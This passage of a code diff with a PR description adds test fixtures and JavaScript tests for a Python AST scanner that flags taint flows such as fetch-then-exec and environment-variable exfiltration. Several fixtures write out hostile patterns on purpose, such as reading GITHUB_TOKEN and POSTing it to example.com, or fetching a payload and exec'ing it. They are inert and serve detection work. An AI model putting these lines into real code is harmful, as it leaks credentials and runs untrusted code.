+import requests
+flag = os.environ.get("MY_FEATURE_FLAG", "default")
+requests.post("https://example.com/telemetry", json={"flag": flag})

--- a/tests/samples/python-ast/env-flag-exfil/package.json
+++ b/tests/samples/python-ast/env-flag-exfil/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-env-flag-exfil-fixture", "version": "0.0.0", "description": "PYAST-010 HIGH (non-sensitive env name → network)." }

--- a/tests/samples/python-ast/env-no-network/__init__.py
+++ b/tests/samples/python-ast/env-no-network/__init__.py
@@ -1,0 +1,5 @@
+# Fixture: NEG — env vars read but never sent over network. No PYAST-010.
+import os
+home = os.environ["HOME"]
+user = os.environ.get("USER", "anonymous")
+print(f"Hello {user}, home is {home}")

--- a/tests/samples/python-ast/env-no-network/package.json
+++ b/tests/samples/python-ast/env-no-network/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-env-no-network-fixture", "version": "0.0.0", "description": "Negative: env read but no network sink — no PYAST-010 fire." }

--- a/tests/samples/python-ast/env-token-exfil/__init__.py
+++ b/tests/samples/python-ast/env-token-exfil/__init__.py
@@ -1,0 +1,6 @@
+# Fixture: PYAST-010 CRITICAL — credential env var read then POSTed.
+# example.com is a reserved test domain (RFC 2606), no real exfil happens.
+import os
+import requests
+token = os.environ["GITHUB_TOKEN"]
+requests.post("https://example.com/collect", data={"t": token})

--- a/tests/samples/python-ast/env-token-exfil/package.json
+++ b/tests/samples/python-ast/env-token-exfil/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-env-token-exfil-fixture", "version": "0.0.0", "description": "PYAST-010 CRITICAL (sensitive env name → network)." }

--- a/tests/samples/python-ast/multi-hop-not-detected/__init__.py
+++ b/tests/samples/python-ast/multi-hop-not-detected/__init__.py
@@ -1,0 +1,6 @@
+# Fixture: NEG — V1 limitation. Multi-hop alias chain a→b→sink is NOT detected.
+# This fixture documents the limitation; Phase 3 (full dataflow) will close it.
+import urllib.request
+a = urllib.request.urlopen("http://127.0.0.1:0/synthetic").read()
+b = a                # ← V1 doesn't propagate taint through this hop
+exec(b)              # ← PYAST-003 fires, PYAST-005 does NOT (limitation, by design)

--- a/tests/samples/python-ast/multi-hop-not-detected/package.json
+++ b/tests/samples/python-ast/multi-hop-not-detected/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-multi-hop-fixture", "version": "0.0.0", "description": "Documented V1 limitation: multi-hop taint (a = source(); b = a; sink(b)) is NOT detected. PYAST-003 fires for exec; PYAST-005 must NOT (Phase 3 will handle multi-hop)." }

--- a/tests/samples/python-ast/reassignment-cleared/__init__.py
+++ b/tests/samples/python-ast/reassignment-cleared/__init__.py
@@ -1,0 +1,6 @@
+# Fixture: NEG — reassignment clears taint. Verifies the V1 invariant
+# documented in handle-assignment.js.
+import urllib.request
+payload = urllib.request.urlopen("http://127.0.0.1:0/synthetic").read()
+payload = "print('overwritten safe value')"   # ← clears the taint
+exec(payload)                                   # ← PYAST-003 fires, PYAST-005 must NOT

--- a/tests/samples/python-ast/reassignment-cleared/package.json
+++ b/tests/samples/python-ast/reassignment-cleared/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-reassignment-cleared-fixture", "version": "0.0.0", "description": "Negative: reassignment to safe value clears taint. PYAST-003 still fires (always for exec at module level), but PYAST-005 must NOT." }

--- a/tests/samples/python-ast/trapdoor-fetch-exec/__init__.py
+++ b/tests/samples/python-ast/trapdoor-fetch-exec/__init__.py
@@ -1,0 +1,4 @@
+# Fixture: PYAST-005 — fetch payload then exec. Inert: localhost port 0 fetches nothing.
+import urllib.request
+payload = urllib.request.urlopen("http://127.0.0.1:0/synthetic").read()
+exec(payload)

--- a/tests/samples/python-ast/trapdoor-fetch-exec/package.json
+++ b/tests/samples/python-ast/trapdoor-fetch-exec/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-trapdoor-fetch-exec-fixture", "version": "0.0.0", "description": "PYAST-005 positive (fetch→exec taint). NOT REAL MALWARE." }

--- a/tests/scanner/python-ast.test.js
+++ b/tests/scanner/python-ast.test.js
@@ -168,6 +168,111 @@ async function runPythonAstTests() {
       cleanup(tmp);
     }
   });
+
+  // =========================================================================
+  // Phase 1b — taint-aware detectors (PYAST-005, 006, 009, 010)
+  // =========================================================================
+
+  await asyncTest('PYAST-005: fetch → exec taint fires CRITICAL', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'trapdoor-fetch-exec'));
+    const exec3 = result.threats.find(t => t.type === 'pyast_module_level_exec');
+    const taint5 = result.threats.find(t => t.type === 'pyast_fetch_to_exec_taint');
+    assert(exec3, 'PYAST-003 (module-level exec) should still fire as baseline');
+    assert(taint5, 'PYAST-005 (fetch+exec taint compound) should fire');
+    assert(taint5.severity === 'CRITICAL', `PYAST-005 expected CRITICAL, got ${taint5.severity}`);
+  });
+
+  await asyncTest('PYAST-006: base64 → exec taint fires CRITICAL', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'base64-exec-taint'));
+    const taint6 = result.threats.find(t => t.type === 'pyast_base64_to_exec_taint');
+    assert(taint6, 'PYAST-006 should fire on base64→exec compound');
+    assert(taint6.severity === 'CRITICAL', `PYAST-006 expected CRITICAL, got ${taint6.severity}`);
+  });
+
+  await asyncTest('PYAST-010: env (sensitive) → network POST fires CRITICAL', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'env-token-exfil'));
+    const exfil = result.threats.find(t => t.type === 'pyast_env_to_network_write');
+    assert(exfil, 'PYAST-010 should fire on env-token+POST');
+    assert(exfil.severity === 'CRITICAL', `expected CRITICAL (sensitive env name GITHUB_TOKEN), got ${exfil.severity}`);
+  });
+
+  await asyncTest('PYAST-010: env (non-sensitive) → network POST fires HIGH', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'env-flag-exfil'));
+    const exfil = result.threats.find(t => t.type === 'pyast_env_to_network_write');
+    assert(exfil, 'PYAST-010 should still fire on non-sensitive env name (defense in depth)');
+    assert(exfil.severity === 'HIGH', `expected HIGH (non-sensitive env name MY_FEATURE_FLAG), got ${exfil.severity}`);
+  });
+
+  await asyncTest('PYAST-009: ctypes literal suspicious path fires HIGH', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'ctypes-tmp-path'));
+    const ctypes = result.threats.find(t => t.type === 'pyast_ctypes_shellcode_load');
+    assert(ctypes, 'PYAST-009 should fire on ctypes.CDLL("/tmp/...")');
+    assert(ctypes.severity === 'HIGH', `expected HIGH, got ${ctypes.severity}`);
+  });
+
+  await asyncTest('PYAST-009: ctypes with tainted-fetch arg fires HIGH', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'ctypes-tainted-fetch'));
+    const ctypes = result.threats.find(t => t.type === 'pyast_ctypes_shellcode_load');
+    assert(ctypes, 'PYAST-009 should fire when ctypes arg was assigned from a fetch');
+  });
+
+  // ---------- Phase 1b negatives ----------
+
+  await asyncTest('PYAST-005: reassignment clears taint (no PYAST-005, but PYAST-003 still fires)', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'reassignment-cleared'));
+    const taint5 = result.threats.find(t => t.type === 'pyast_fetch_to_exec_taint');
+    const exec3 = result.threats.find(t => t.type === 'pyast_module_level_exec');
+    assert(!taint5, 'PYAST-005 must NOT fire after reassignment clears the taint');
+    assert(exec3, 'PYAST-003 (module-level exec) still fires regardless of taint');
+  });
+
+  await asyncTest('PYAST-005: V1 documented limitation — multi-hop alias NOT detected', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'multi-hop-not-detected'));
+    const taint5 = result.threats.find(t => t.type === 'pyast_fetch_to_exec_taint');
+    assert(!taint5,
+      'V1 of the taint tracker does NOT propagate across `a = src(); b = a; sink(b)`. ' +
+      'If this test starts failing, the implementation grew multi-hop support — bump to Phase 3.');
+  });
+
+  await asyncTest('PYAST-009: legit ctypes (system lib path) does NOT fire', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'ctypes-legit-lib'));
+    const ctypes = result.threats.find(t => t.type === 'pyast_ctypes_shellcode_load');
+    assert(!ctypes, 'ctypes.CDLL("libssl.so") / ctypes.CDLL("/usr/lib/libc.so") are legit, must NOT fire');
+  });
+
+  await asyncTest('PYAST-010: env read without network sink does NOT fire', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'env-no-network'));
+    const exfil = result.threats.find(t => t.type === 'pyast_env_to_network_write');
+    assert(!exfil, 'reading os.environ without POSTing it must NOT fire PYAST-010');
+  });
+
+  // ---------- Taint tracker unit tests (direct API) ----------
+
+  await asyncTest('PYAST taint: classifyTaintSource detects fetch chains', async () => {
+    const tsModule = require('web-tree-sitter');
+    await tsModule.Parser.init();
+    const lang = await tsModule.Language.load(
+      path.join(__dirname, '..', '..', 'src', 'vendor', 'tree-sitter-python.wasm')
+    );
+    const parser = new tsModule.Parser();
+    parser.setLanguage(lang);
+    const { classifyTaintSource } = require('../../src/scanner/python-ast-detectors/taint-tracker.js');
+
+    function rhsOf(src) {
+      const tree = parser.parse(src);
+      return tree.rootNode.firstChild.firstChild.childForFieldName('right');
+    }
+
+    assert(classifyTaintSource(rhsOf('x = requests.get("u").text')).sourceType === 'fetch',
+      'requests.get(...).text should classify as fetch');
+    assert(classifyTaintSource(rhsOf('x = base64.b64decode(b"a")')).sourceType === 'base64',
+      'base64.b64decode should classify as base64');
+    const env = classifyTaintSource(rhsOf('x = os.environ["NPM_TOKEN"]'));
+    assert(env.sourceType === 'env' && env.envVarName === 'NPM_TOKEN',
+      'os.environ["NPM_TOKEN"] should classify as env with name NPM_TOKEN');
+    assert(classifyTaintSource(rhsOf('x = "harmless"')) === null,
+      'plain string literal should not classify');
+  });
 }
 
 module.exports = { runPythonAstTests };


### PR DESCRIPTION
4 detectors taint-aware: fetch→exec (005), base64→exec (006), ctypes shellcode (009), env→network exfil (010). Mini-taint tracker intra-procédural mono-fichier.